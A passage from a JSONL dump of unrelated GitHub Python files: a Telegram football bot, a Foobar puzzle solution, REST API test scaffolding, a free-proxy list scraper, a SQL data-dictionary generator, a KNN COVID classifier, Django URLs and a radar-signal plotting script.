```\", parse_mode=\"markdown\")\n return\n\n\n# tries connection to API\ndef get_connection(bot):\n try:\n connection = http.client.HTTPConnection(\"api.football-data.org\")\n except Exception as e:\n error(bot)\n connection = None\n return connection\n\n\n# gets table from API\ndef get_table(connection, league_id):\n try:\n connection.request(\"GET\", \"/v1/competitions/{}/leagueTable\".format(league_id), None, headers)\n except:\n error(bot)\n return\n return json.loads(connection.getresponse().read().decode())\n\n\n# Champions League table is divided in groups, needs its own parsing\ndef CL_table(response):\n league_id = 464\n ranks = []\n for group in response[\"standings\"]:\n ranks.append(\"\\n*Group {}*\".format(group))\n for rank in response[\"standings\"][group]:\n ranks.append(\"``` {0:22s} {1:d} ```\".format(leagues_teams_ids[league_id][rank[\"teamId\"]], rank[\"points\"]))\n return \"*{0:s}*\\nMatchday {1:2d}\\n{2:s}\".format(\n response[\"leagueCaption\"], response[\"matchday\"], \"\\n\".join(ranks))\n\n\n# posts table of league\ndef table(bot, update, args):\n connection = get_connection(bot)\n if connection is None:\n return\n try:\n league_id = leagues[args[0].upper()]\n except Exception as e:\n league_id = 456\n response = get_table(connection, league_id)\n if league_id == 464:\n string = CL_table(response)\n else:\n ranks = []\n for rank in response[\"standing\"]:\n ranks.append(\"{0:2d} {1:22s} {2:d}\".format(\n rank[\"rank\"], leagues_teams_ids[league_id][rank[\"teamId\"]], rank[\"points\"]))\n string = \"*{0:s}*\\nMatchday {1:2d}\\n```{2:s}```\".format(\n response[\"leagueCaption\"], response[\"matchday\"], \"\\n\".join(ranks))\n bot.send_message(chat_id=update.message.chat_id,\n text=string, parse_mode=\"markdown\")\n return\n\n\n# parse fixtures, generates formatted message\ndef parse_fixtures(response, league_id, matchday, flag, time_zone):\n fixtures = []\n for fixture in response[\"fixtures\"]:\n if flag == 1 and fixture[\"status\"] != \"IN_PLAY\":\n continue\n if flag == 2 and fixture[\"status\"] == \"FINISHED\":\n continue\n else:\n home_goals = fixture[\"result\"][\"goalsHomeTeam\"]\n away_goals = fixture[\"result\"][\"goalsAwayTeam\"]\n if home_goals is None:\n home_goals = 0\n if away_goals is None:\n away_goals = 0\n fixtures.append(\"{0:s}\\n``` {1:>13s} {2:d} - {3:d} {4:s}```\\n\".format(parse_date(fixture[\"date\"], time_zone, fixture[\"status\"]), leagues_teams_ids[league_id][fixture[\"homeTeamId\"]], home_goals, away_goals, leagues_teams_ids[league_id][fixture[\"awayTeamId\"]]))\n return \"*{0:s}*\\nMatchday {1:d}\\n\\n{2:s}\".format(competitions_ids[league_id], matchday, \"\\n\".join(fixtures))\n\n\n# get current matchday for league_id\ndef get_matchday(connection, league_id):\n return get_table(connection, league_id)[\"matchday\"]\n\n\n# get time zone from arg\ndef get_tz(arg):\n try:\n time_zone = int(arg)\n except Exception as e:\n return 0\n return time_zone\n\n\n# parse args from /fixtures/live/remaining command\ndef get_league_matchday(connection, args, flag):\n # get league id\n if not args:\n league_id = 456\n matchday = get_matchday(connection, league_id)\n time_zone = 0\n else:\n try:\n league_id = leagues[args[0].upper()]\n except Exception as e:\n league_id = 456\n # format args for later parsing\n args.insert(0, 0)\n # if live/remaining get current matchday and time zone\n if flag != 0:\n matchday = get_matchday(connection, league_id)\n for arg in args:\n time_zone = get_tz(arg)\n # else try to read matchday from args\n elif flag == 0:\n 
\n\n# parse args from /fixtures/live/remaining command\ndef get_league_matchday(connection, args, flag):\n    # get league id\n    if not args:\n        league_id = 456\n        matchday = get_matchday(connection, league_id)\n        time_zone = 0\n    else:\n        try:\n            league_id = leagues[args[0].upper()]\n        except Exception as e:\n            league_id = 456\n        # format args for later parsing\n        args.insert(0, 0)\n        # if live/remaining get current matchday and time zone\n        if flag != 0:\n            matchday = get_matchday(connection, league_id)\n            for arg in args:\n                time_zone = get_tz(arg)\n        # else try to read matchday from args\n        elif flag == 0:\n            if len(args) == 2:\n                time_zone = 0  # matchday given but no UTC offset; default to UTC\n                try:\n                    matchday = int(args[1])\n                except Exception as e:\n                    matchday = get_matchday(connection, league_id)\n            else:\n                try:\n                    matchday = int(args[1])\n                except Exception as e:\n                    matchday = get_matchday(connection, league_id)\n                time_zone = get_tz(args[2])\n    return league_id, matchday, time_zone\n\n\n# get fixtures for league and matchday\n# flag == 0 for whole matchday\n# flag == 1 for live games in matchday\n# flag == 2 for remaining games in matchday, includes live games\ndef get_fixtures(bot, args, flag, update):\n    connection = get_connection(bot)\n    if connection is None:\n        return\n    league_id, matchday, time_zone = get_league_matchday(connection, args, flag)\n    try:\n        connection.request(\"GET\", \"/v1/competitions/{}/fixtures?matchday={}\".format(league_id, matchday), None, headers)\n    except Exception as e:\n        error(bot, update)\n        return\n    bot.send_message(chat_id=update.message.chat_id,\n                     text=parse_fixtures(json.loads(connection.getresponse().read().decode()), league_id, matchday, flag, time_zone), parse_mode=\"markdown\")\n    return\n\n\n# gets fixtures for matchday and league\ndef fixtures(bot, update, args):\n    get_fixtures(bot, args, 0, update)\n    return\n\n\n# gets live fixtures for league\ndef live(bot, update, args):\n    get_fixtures(bot, args, 1, update)\n    return\n\n\n# gets remaining fixtures for league\ndef remaining(bot, update, args):\n    get_fixtures(bot, args, 2, update)\n    return\n\n\n# start/help message\ndef start(bot, update):\n    string = \"`/help ` command list\\n`/table [league-code]` shows table for selected league\\n`/fixtures [league-code] [matchday] [UTC-offset]` shows fixtures for selected league and matchday, e.g. `/fixtures SA 13 2`\\n`/live [league-code] [UTC-offset]` shows live fixtures for selected league\\n`/remaining [league-code] [UTC-offset]` shows remaining fixtures for selected league\\n`/team [team-name] [days] [UTC-offset]` shows fixture for team in the following days (all competitions)\\n\\nLeague codes:\\n`BSA` Brazilian Serie A\\n`PL ` Premier League\\n`ELC` Championship\\n`EL1` League One\\n`EL2` League Two\\n`DED` Eredivisie\\n`FL1` Ligue 1\\n`FL2` Ligue 2\\n`BL1` Bundesliga\\n`BL2` 2. Bundesliga\\n`PD ` La Liga\\n`SA ` Serie A\\n`PPL` Primeira Liga\\n`DFB` DFB Pokal\\n`SB ` Serie B\\n`CL ` Champions League\"\n    bot.send_message(chat_id=update.message.chat_id,\n                     text=string, parse_mode=\"markdown\")\n    return\n
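\n\n# Shape assumed here (the teams* dicts live in football_tg_bot_const and are not\n# shown in this file): they map display names to API team ids, e.g.\n#   teamsSA = {\"Juventus FC\": 109, \"AS Roma\": 100, ...}\n# get_team below does a case-insensitive substring match against those names.\n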
\n\n# get fixtures for team for following days\ndef get_team(bot, update, args):\n    team = args[0].lower()\n    connection = get_connection(bot)\n    if connection is None:\n        return\n    # gets days from args\n    try:\n        days = int(args[1])\n    except Exception as e:\n        days = 15\n    try:\n        time_zone = int(args[2])\n    except Exception as e:\n        time_zone = 0\n    # looks through all teams of (almost) all leagues\n    # order of popularity/frequency of query (just a guess)\n    # TODO (?) add remaining leagues FL2, BL2, BSA, ELC, EL1, EL2\n    team_id = 0\n    for league_teams in (teamsSA, teamsPL, teamsSB, teamsCL, teamsPD,\n                         teamsBL1, teamsFL1, teamsDED, teamsPPL):\n        for t in league_teams:\n            if team in t.lower():\n                team_id = league_teams[t]\n                break\n        if team_id != 0:\n            break\n    if team_id == 0:\n        return\n    fixtures = []\n    if days > 0:\n        connection.request(\"GET\", \"/v1/teams/{}/fixtures?timeFrame=n{}\".format(team_id, days), None, headers)\n        response = json.loads(connection.getresponse().read().decode())\n        for fixture in response[\"fixtures\"]:\n            fixtures.append(\"*{}* {}\\n_Matchday {}_\\n{} - {}\\n\".format(competitions_ids[fixture[\"competitionId\"]], parse_date(fixture[\"date\"], time_zone, fixture[\"status\"]), fixture[\"matchday\"], leagues_teams_ids[fixture[\"competitionId\"]][fixture[\"homeTeamId\"]], leagues_teams_ids[fixture[\"competitionId\"]][fixture[\"awayTeamId\"]]))\n    elif days < 0:\n        connection.request(\"GET\", \"/v1/teams/{}/fixtures?timeFrame=p{}\".format(team_id, -days), None, headers)\n        response = json.loads(connection.getresponse().read().decode())\n        for fixture in response[\"fixtures\"]:\n            fixtures.append(\"*{}* {} - _Matchday {}_\\n`{:>15s} {}-{} {}`\\n\".format(competitions_ids[fixture[\"competitionId\"]], parse_date_no_day(fixture[\"date\"], time_zone), fixture[\"matchday\"], leagues_teams_ids[fixture[\"competitionId\"]][fixture[\"homeTeamId\"]], fixture[\"result\"][\"goalsHomeTeam\"], fixture[\"result\"][\"goalsAwayTeam\"], leagues_teams_ids[fixture[\"competitionId\"]][fixture[\"awayTeamId\"]]))\n    bot.send_message(chat_id=update.message.chat_id,\n                     text=\"{}\".format(\"\\n\".join(fixtures)), parse_mode=\"markdown\")\n    return\n\n\nbot = telegram.Bot(token=bot_token)\nupdater = Updater(bot_token)\n\n# defines telegram commands\nupdater.dispatcher.add_handler(CommandHandler([\"start\", \"help\", \"aiuto\"], start))\nupdater.dispatcher.add_handler(CommandHandler('table', table, pass_args=True))\nupdater.dispatcher.add_handler(CommandHandler('team', get_team, pass_args=True))\nupdater.dispatcher.add_handler(CommandHandler('fixtures', fixtures, pass_args=True))\nupdater.dispatcher.add_handler(CommandHandler('live', live, pass_args=True))\nupdater.dispatcher.add_handler(CommandHandler('remaining', remaining, pass_args=True))\n\n# starts bot, waits for commands\nupdater.start_polling()\nupdater.idle()\n","repo_name":"TommasoAmici/football_telegram_bot","sub_path":"football_telegram_bot.py","file_name":"football_telegram_bot.py","file_ext":"py","file_size_in_byte":11414,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"23388230488","text":"import sys\nsys.stdin = open(\"..//input.txt\",\"r\")\nsys.stdout = open(\"..//output.txt\",\"w\")\n# t = int(input())\n# for inputting an array: arr = [int(x) for x in raw_input().split()]\n# \ta, b, c, x = map(int, raw_input().split())\n\n
def subtract(x, y, b):\n\tans = []\n\tfor i in range(len(x)):\n\t\tif x[i] < y[i]:\n\t\t\tx[i] = x[i] + b\n\t\t\tx[i+1] = x[i+1] - 1\n\t\tans.append(str(x[i]-y[i]))\n\tans.reverse()\n\treturn ''.join(ans)\n\n\ndef conv(x):\n\tarr = []\n\tfor i in range(len(x)):\n\t\ttemp = ord(x[i]) - 48\n\t\tarr.append(temp)\n\tarr.reverse()\n\treturn arr\n\ndef s(n, b):\n\tx_int = ''.join(sorted(n, reverse = True))\n\ty_int = ''.join(sorted(n, reverse = False))\n#\tprint(x_int, y_int)\n\tif len(x_int) != len(n):\n\t\tx_int = '0'*(len(n)-len(x_int)) + x_int\n\tif len(y_int) != len(n):\n\t\ty_int = '0'*(len(n)-len(y_int)) + y_int\n\n\tx1 = conv(x_int)\n\ty1 = conv(y_int)\n#\tprint(x1,y1)\n#\tprint(subtract(x1,y1,b))\n\treturn subtract(x1, y1, b)\n\ndef solution(n, b):\n\ttemp = 0\n\tarr = []\n\tarr.append(n)\n\twhile 1:\n\t\ttemp = s(n, b)\n\t\tif temp not in arr:\n\t\t\tarr.append(temp)\n\t\t\tn = temp\n\t\telse:\n\t\t\tbreak\n\treturn len(arr) - arr.index(temp)\n\nn = input()\nb = int(input())\n\nprint(solution(n, b))\n
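\n# For base 10, s('210', 10) computes 210 - 012 = '198'; iterating from there,\n# solution('210', 10) reaches the fixed point 495 (954 - 459 = 495) and returns 1,\n# the length of the terminal cycle.\n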
","repo_name":"utkryuk/Foobar-Challenge","sub_path":"hey-i-already-did-that.py","file_name":"hey-i-already-did-that.py","file_ext":"py","file_size_in_byte":1127,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28772644775","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\n \n\"\"\"\nfrom datetime import datetime\nfrom json import loads\nimport logging\nfrom threading import Thread\nfrom urllib.parse import urljoin\nimport os\n\nfrom flask import Flask\nimport requests\nfrom sqlalchemy import create_engine, schema, event, Column, Integer, String, ForeignKey, DateTime, func, Float\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.ext.hybrid import hybrid_property\nfrom sqlalchemy.orm import sessionmaker, relationship, scoped_session, backref\nimport tornado.web\nimport tornado.ioloop\nfrom flask.ext.restless import APIManager as FlaskRestlessManager\n\nfrom tornado_restless import ApiManager as TornadoRestlessManager\n\n\n__author__ = 'Martin Martimeo '\n__date__ = '21.08.13'\n\n\nclass TestBase(object):\n    \"\"\"\n    Base class for all tests\n\n    sets up tornado_restless and flask_restless\n    \"\"\"\n\n    config = {\n        'dns': 'sqlite:///test.lite',\n        'encoding': 'utf-8',\n        'tornado': {'port': 7600}\n    }\n\n    def setUp(self):\n\n        self.setUpAlchemy()\n        self.setUpModels()\n        self.setUpFlask()\n        self.setUpTornado()\n        self.setUpRestless()\n\n    def setUpFlask(self):\n        \"\"\"\n        Create Flask application\n        \"\"\"\n\n        app = Flask(__name__)\n        app.config['DEBUG'] = True\n        app.config['TESTING'] = True\n        app.config['SQLALCHEMY_DATABASE_URI'] = self.config['dns']\n\n        self.flask = app\n\n    def setUpTornado(self):\n        \"\"\"\n        Create Tornado application\n        \"\"\"\n        app = tornado.web.Application([])\n        app.listen(self.config['tornado']['port'])\n        self.tornado = app\n\n    def setUpRestless(self):\n        \"\"\"\n        Create blueprints\n        \"\"\"\n        Session = self.alchemy['Session']\n\n        self.api = {'tornado': TornadoRestlessManager(application=self.tornado, session_maker=Session),\n                    'flask': FlaskRestlessManager(self.flask, session=Session())}\n\n        for model, methods in self.models.values():\n            if methods == \"all\":\n                self.api['tornado'].create_api(model, methods=TornadoRestlessManager.METHODS_ALL)\n                self.api['flask'].create_api(model, methods=TornadoRestlessManager.METHODS_ALL)\n            else:\n                self.api['tornado'].create_api(model)\n                self.api['flask'].create_api(model)\n\n        class TornadoThread(Thread):\n\n            def run(self):\n                try:\n                    tornado.ioloop.IOLoop.instance().start()\n                finally:\n                    del self._target\n\n        self.threads = {'tornado': TornadoThread(target=self),\n                        'flask': self.flask.test_client()}\n        self.threads['tornado'].start()\n\n    def curl_tornado(self, url, method='get', assert_for=200, **kwargs):\n        url = urljoin('http://localhost:%u' % self.config['tornado']['port'], url)\n        r = getattr(requests, method)(url, **kwargs)\n        if assert_for == 200:\n            r.raise_for_status()\n        else:\n            assert assert_for == r.status_code\n        try:\n            try:\n                return r.json()\n            except ValueError:\n                return None\n        finally:\n            r.close()\n\n    def curl_flask(self, url, method='get', assert_for=200, **kwargs):\n\n        # Map request parameter params to environ param query_string\n        if 'params' in kwargs:\n            kwargs['query_string'] = kwargs['params']\n            del kwargs['params']\n\n        r = getattr(self.threads['flask'], method)(url, **kwargs)\n        assert assert_for == r.status_code\n        return loads(r.data.decode(self.config['encoding']))\n\n    def setUpAlchemy(self):\n        \"\"\"\n        Init SQLAlchemy engine\n        \"\"\"\n        engine = create_engine(self.config['dns'])\n        metadata = schema.MetaData()\n        Session = scoped_session(sessionmaker(bind=engine))\n        Base = declarative_base(metadata=metadata)\n\n        self.alchemy = {'Base': Base, 'Session': Session, 'engine': engine}\n\n    def setUpModels(self):\n        \"\"\"\n        Create models\n        \"\"\"\n\n        Base = self.alchemy['Base']\n        Session = self.alchemy['Session']\n        engine = self.alchemy['engine']\n\n        class City(Base):\n            __tablename__ = \"cities\"\n\n            _plz = Column(String(6), primary_key=True)\n\n            name = Column(String, unique=True)\n\n        class Person(Base):\n            __tablename__ = 'persons'\n\n            _id = Column(Integer, primary_key=True)\n            name = Column(String, unique=True)\n            birth = Column(DateTime)\n\n            @hybrid_property\n            def age(self):\n                return (datetime.now() - self.birth).days / 365.25\n\n            @age.expression\n            def age(self):\n                return func.now() - self.birth\n\n            def __init__(self, name, age):\n                self.name = name\n                self.birth = datetime.now().replace(year=datetime.now().year - age)\n\n        class City2Person(Base):\n            __tablename__ = 'city2persons'\n\n            _city = Column(ForeignKey(City._plz), primary_key=True)\n            city = relationship(City, lazy=\"joined\", backref=backref('persons', lazy=\"dynamic\"))\n\n            _user = Column(ForeignKey(Person._id), primary_key=True)\n            user = relationship(Person, lazy=\"joined\", backref=backref('cities', lazy=\"dynamic\"))\n\n            def __init__(self, city, user):\n                self._city = city._plz\n                self._user = user._id\n\n        class Computer(Base):\n            __tablename__ = 'computers'\n\n            _id = Column(Integer, primary_key=True)\n\n            cpu = Column(Float)\n            ram = Column(Float)\n\n            _user = Column(ForeignKey(Person._id))\n            user = relationship(Person, backref='computers')\n
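\n        # e.g. Person('Claudia', 20).age is roughly 20.0: __init__ shifts the birth\n        # date back 20 years and the hybrid property divides the elapsed days by 365.25.\n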
\n        Base.metadata.drop_all(engine)\n        Base.metadata.create_all(engine)\n\n        self.models = {'Person': (Person, \"all\"), 'Computer': (Computer, \"all\"), 'City': (City, \"read\")}\n\n        frankfurt = City(_plz=60400, name=\"Frankfurt\")\n        berlin = City(_plz=10800, name=\"Berlin\")\n\n        self.cities = [frankfurt, berlin]\n\n        anastacia = Person('Anastacia', 44)\n        bernd = Person('Bernd', 48)\n        claudia = Person('Claudia', 20)\n        dennise = Person('Dennise', 14)\n        emil = Person('Emil', 81)\n        feris = Person('Feris', 10)\n\n        self.persons = {p.name: p for p in [anastacia, bernd, claudia, dennise, emil, feris]}\n\n        a1 = Computer(user=anastacia, cpu=3.2, ram=4)\n        a2 = Computer(user=anastacia, cpu=12, ram=4)\n        b1 = Computer(user=bernd, cpu=12, ram=8)\n        e1 = Computer(user=emil, cpu=1.6, ram=2)\n        e2 = Computer(user=emil, cpu=3.4, ram=4)\n\n        self.computers = [a1, a2, b1, e1, e2]\n\n        session = Session()\n        session.add_all(self.cities)\n        session.add_all(self.persons.values())\n        session.add_all(self.computers)\n        session.commit()\n\n        session.refresh(bernd)\n        session.refresh(anastacia)\n        self.assocs = [City2Person(frankfurt, bernd), City2Person(frankfurt, anastacia), City2Person(berlin, bernd)]\n        session.add_all(self.assocs)\n        session.commit()\n\n    def tearDown(self):\n\n        self.tearDownTornado()\n        self.tearDownAlchemy()\n\n    def tearDownAlchemy(self):\n\n        Base = self.alchemy['Base']\n        engine = self.alchemy['engine']\n\n        Base.metadata.drop_all(engine)\n\n        del self.alchemy\n\n        os.unlink('test.lite')\n\n    def tearDownTornado(self):\n\n        self.config['tornado']['port'] += 1\n\n        def stop():\n            \"\"\"\n            Stop the IOLoop\n            \"\"\"\n            tornado.ioloop.IOLoop.instance().stop()\n\n        tornado.ioloop.IOLoop.instance().add_callback(stop)\n        self.threads['tornado'].join()\n\n    def subsetOf(self, a, b):\n        \"\"\"\n        Test whether a is a subset of b (or b a superset of a)\n        \"\"\"\n\n        if type(a) != type(b):\n            logging.error(\"Types of a and b are not equal\")\n            return False\n\n        if isinstance(a, dict) or hasattr(a, \"items\"):\n            for (key, value) in a.items():\n                if not self.subsetOf(value, b[key]):\n                    return False\n            else:\n                return True\n\n        if isinstance(a, list) or hasattr(a, \"__iter__\"):\n            for element in a:\n                if element not in b:\n                    return False\n            else:\n                return True\n\n        return a == b\n\n\nif __name__ == \"__main__\":\n\n    logging.basicConfig(level=logging.DEBUG)\n    base = TestBase()\n    base.setUp()\n    try:\n        base.threads[\"tornado\"].join()\n    except KeyboardInterrupt:\n        base.tearDown()\n","repo_name":"ovgu-ttz/tornado-restless","sub_path":"tests/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":8769,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"74036396009","text":"#!/usr/bin/python2.7\n# -*- coding: utf-8 -*-\nimport requests\nfrom helper.extras import save_proxy, proxy_checker\nfrom helper.logger import Logger\n\n\nclass Hidester:\n    def __init__(self):\n        self.logger = Logger(name=self.__class__.__name__)\n\n    def get_data(self):\n        results = None\n        try:\n            url = \"https://hidester.com/proxydata/php/data.php\"\n            querystring = {\"mykey\": \"data\", \"offset\": \"0\", \"limit\": \"500\", \"orderBy\": \"latest_check\",\n                           \"sortOrder\": \"DESC\",\n                           \"country\": \"\", \"port\": \"\", \"type\": \"http\", \"anonymity\": \"undefined\",\n                           \"ping\": \"undefined\",\n                           \"gproxy\": \"2\"}\n            headers = {\n                'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',\n                'X-Requested-With': 'XMLHttpRequest',\n                'Host': 'hidester.com',\n                'Referer': 'https://hidester.com/proxylist/'}\n\n            response = requests.request(\"GET\", url, headers=headers, params=querystring)\n            if response.status_code == 200:\n                results = response.json()\n                results = [x for x in results if x['type'] == 'http']\n        except Exception as e:\n            raise e\n        return results\n\n    def proxy_parser(self, data):\n        results = []\n        try:\n            for result in data:\n                result['address'] = result['IP']\n                result['port'] = result['PORT']\n                results.append(result)\n        except Exception as e:\n            raise e\n        return results\n\n    def main(self, path):\n        html_dict = self.get_data()\n        checker = self.proxy_parser(html_dict)\n        self.logger.log('get {} proxies'.format(len(checker)))\n        save_proxy(proxies=proxy_checker(checker), 
location=path)\n","repo_name":"yudhiana/proxy-generator","sub_path":"crawler/Hidester.py","file_name":"Hidester.py","file_ext":"py","file_size_in_byte":1912,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4838498940","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Oct 18 17:56:43 2021\n\n@author: lucas\n\"\"\"\nimport pandas as pd\n\nfrom pathlib import Path\nGR_BASE_DIR = Path(__file__).resolve().parent.parent\n\n\ndata = open(f'{GR_BASE_DIR}/SQL-base-completo-DW.sql', \n 'r', \n encoding=\"utf8\")\n\nschema = ''\ntabela = ''\ncampo = ''\ntipo = ''\ntamanho = 0\nespecificacoes = ''\nvirgula = ''\n\narquivo = open(f'{GR_BASE_DIR}/SQL-cadastro-dic.sql','w')\n\narquivo.write(f'INSERT INTO dic_dados \\n')\narquivo.write(f' (schema, tabela, campo, tipo, tamanho, especificacoes, observacao)')\narquivo.write(f'\\n')\narquivo.write(f'VALUES')\narquivo.write(f'\\n')\n\nfor text in data:\n \n text = text.replace('\\n', ' ').replace('\\t', ' ').replace(',', ' ')\n \n inf = []\n \n for i in text.split(' '):\n if i != '':\n inf.append(i)\n \n inf = ' '.join(inf).replace(\"'\", '\"')\n \n if len(inf) != 0:\n if 'TABLE' in inf and 'CREATE' in inf:\n \n controle = False\n aux = inf.split(' ')[5].split('.')\n tabela = aux[1]\n schema = aux[0]\n \n elif 'EXTENSION' not in inf and \\\n 'SEQUENCE' not in inf and \\\n 'SCHEMA' not in inf and \\\n 'FOREIGN' not in inf and \\\n 'GRANT' not in inf and \\\n ');' not in inf:\n\n lin = inf.split('--')\n observacao = lin[1].strip()\n inf = lin[0].split(' ')\n\n if len(inf) > 2:\n \n campo = inf[0]\n \n if 'TIMESTAMP' in inf and 'ZONE' in inf:\n tipo = ' '.join(inf[1:5])\n especificacoes = ' '.join(inf[5:])\n \n else:\n tipo = inf[1]\n especificacoes = ' '.join(inf[2:])\n \n elif len(inf) == 2:\n \n campo = inf[0]\n tipo = inf[1]\n \n \n if 'VARCHAR' in tipo:\n \n aux = tipo.replace('(', ' ').replace(')', '')\n aux = aux.split(' ')\n tipo = aux[0]\n tamanho = aux[1]\n \n arquivo.write(f'{virgula}')\n arquivo.write(f' (')\n arquivo.write(f\"'{schema}', \")\n arquivo.write(f\"'{tabela}', \")\n arquivo.write(f\"'{campo}', \")\n arquivo.write(f\"'{tipo}', \")\n arquivo.write(f\"{tamanho}, \")\n arquivo.write(f\"'{especificacoes}',\")\n arquivo.write(f\"'{observacao}'\")\n arquivo.write(f')')\n \n campo = ''\n tipo = ''\n tamanho = 0\n especificacoes = ''\n virgula = ',\\n'\n\narquivo.write(f'\\n') \narquivo.close()\n\n\n \n","repo_name":"lucas-reinaldet/Anotacoes","sub_path":"01 - Python-Uteis/Dic_dados.py","file_name":"Dic_dados.py","file_ext":"py","file_size_in_byte":2917,"program_lang":"python","lang":"pt","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"22429799732","text":"import numpy as np\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.neighbors import KNeighborsClassifier\n\nglobal data\ndef getData():\n global data\n data = pd.read_csv('files/covid.csv')\n\ndef prepareData():\n global data\n #print(data.isna().sum())\n features = [\n 'Dry-Cough',\n 'Difficulty-in-Breathing',\n 'Sore-Throat',\n 'Runny-Nose',\n 'Fever',\n 'Tiredness'\n ]\n target = ['Infected']\n independentTraining, independentTest, dependentTraining, dependentTest = train_test_split(data[features], data[target], test_size=0.3, random_state=0)\n return {\n 'independentTraining': independentTraining,\n 'independentTest': independentTest,\n 'dependentTraining': dependentTraining,\n 'dependentTest': dependentTest\n }\n\ndef 
model(dataModel):\n knn = KNeighborsClassifier(n_neighbors=7)\n dependentTraining = np.ravel(dataModel['dependentTraining'])\n knn.fit(dataModel['independentTraining'], dependentTraining)\n prediction = knn.predict(dataModel['independentTest'])\n accuracy = knn.score(dataModel['independentTest'], dataModel['dependentTest'])\n return {\n 'prediction': prediction,\n 'accuracy': accuracy\n }\n\ndef message(prediction):\n numberOfPredictions = [int(predictions) for predictions in prediction['prediction']]\n accuracyRound = round(prediction['accuracy'], 2)\n effectiveness = accuracyRound * 100\n infected = numberOfPredictions.count(1)\n noInfected = numberOfPredictions.count(0)\n message = 'This is the prediction of the model:'\n message += '\\n'\n message += 'Infected: ' + str(infected)\n message += '\\n'\n message += 'No infected: ' + str(noInfected)\n message += '\\n'\n message += 'The effectiveness of the model was: ' + str(effectiveness) + '%'\n print(message)\n\ndef run():\n getData()\n prediction = model(prepareData())\n message(prediction)\n\nif __name__ == '__main__':\n run()","repo_name":"ecorrea1010/supervisedLearning","sub_path":"src/KnnAlgorithm.py","file_name":"KnnAlgorithm.py","file_ext":"py","file_size_in_byte":1991,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23096707163","text":"from django.conf.urls import include, url\nimport views\n\n\nurlpatterns = [\n url(\n r'^retrieve-apiuser/(?P[0-9]+)/$',\n views.DetailApiKeyUser.as_view()\n ),\n url(\n r'^generate-token/$',\n views.GenerateToken.as_view()\n ),\n url(\n r'^example/$',\n views.ExampleView.as_view()\n ),\n\n]\n","repo_name":"VEinteligente/vsf-incidents-server","sub_path":"vsf_user/rest/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":344,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"11492776217","text":"from postgresql_operations import read_table_postgresql\nimport matplotlib.pyplot as plt\nimport numpy as np \n\ndef plot_radar_signal(data, title):\n \"\"\"Plots a single received signal from the radar sample\"\"\"\n plt.figure(figsize = (10, 5))\n plt.plot(data)\n plt.xlabel('# Sample ')\n plt.ylabel(\"Amplitude [V]\")\n plt.title(f\"{title}\")\n plt.savefig(\"./images_/{}\".format(title))\n plt.show()\n\ndef visualize_radar_samples(data, title):\n \"\"\"Plots a radar sample\"\"\"\n plt.figure(figsize = (10, 3))\n plt.imshow(data,interpolation=\"none\")\n plt.xlabel('# Sample')\n plt.ylabel(\"\")\n plt.title(f\"{title}\")\n plt.savefig(\"./images_/{}\".format(title))\n plt.show()\n\ndef extract_data_per_no_persons(table_name, detailed_label, database_config):\n \"\"\"Extracts a sigle radar sample from table_name, based on the number of persons number_persons\"\"\"\n query = \"\"\"SELECT radar_sample FROM PUBLIC.{} WHERE detailed_label = '{}' LIMIT 1;\"\"\".format(table_name, detailed_label)\n headers, data = read_table_postgresql(table_name=table_name,database_config= database_config, limit = 1, query = query)\n return data \n\ndef visualize_radar_samples_by_scenario(data, scenario, number_persons):\n \"\"\"Visualize a radar sample and a single received signal from the radar sample by scenario and number of persons\"\"\"\n title_radar_sample = f\"Radar Sample, {number_persons} persons, {scenario} scenario\"\n title_plot_signal = f\"Received Signal, {number_persons} persons in the radar range, {scenario} scenario\"\n visualize_radar_samples(data, title_radar_sample)\n 
plot_radar_signal(data[100, :], title=title_plot_signal)\n\n\nif __name__ == \"__main__\":\n database_config = {\n 'host': 'localhost',\n 'port': 5432,\n 'dbname': 'UWB_Radar_Samples',\n 'user': '',\n 'password': ''\n }\n tables ={\n \"scenario_1\": [\"people_walking_5m_area\", \"people walking in 5m area\"],\n \"scenario_2\" :[\"people_standing_queue_0_15\", \"people standing in a queue\"],\n \"scenario_3\": [\"density_3_m2_11_20\", \"people walking in a room with 3 persons per m2\"],\n \"scenario_4\": [\"density_4_m2_11_20\" , \"people walking in a room with 4 persons per m2\",],\n \"processed_data\": [\"processed_data\", \"\"]\n }\n table_name = tables[\"processed_data\"][0]\n scenario = tables[\"processed_data\"][1]\n scenario = 'in the first'\n detailed_label = 110\n number_persons = 10\n shape = (200, 50)\n data = extract_data_per_no_persons(table_name=table_name, detailed_label=detailed_label, database_config=database_config)\n data = np.array(data)\n data_res = np.reshape(data, shape)\n # data_prep = process_data_pipeline(data_res, fs=39*1e9)\n visualize_radar_samples_by_scenario(data=data_res, scenario=scenario, number_persons=number_persons)\n\n\n","repo_name":"cristinaa211/People_counting_CNN_UWB","sub_path":"tools/visualize_data.py","file_name":"visualize_data.py","file_ext":"py","file_size_in_byte":2821,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"71308680809","text":"\nfrom tf_SDUnet import image_gen,image_util,unet,util\nimport numpy as np\n\n#preparing data loading\n# data_provider = image_util.ImageDataProvider(\"nuclei/*.png\",data_suffix=\".png\", mask_suffix=' (2).png', n_class=2)\n#\n# data_provider = image_util.ImageDataProvider(\"data_set/train/*.tif\",data_suffix=\".tif\", mask_suffix='_mask.tif', n_class=2)\nDT = image_util.ImageDataProvider(\"test2/DT/*.tif\",data_suffix=\".tif\", mask_suffix='_binary.tif', 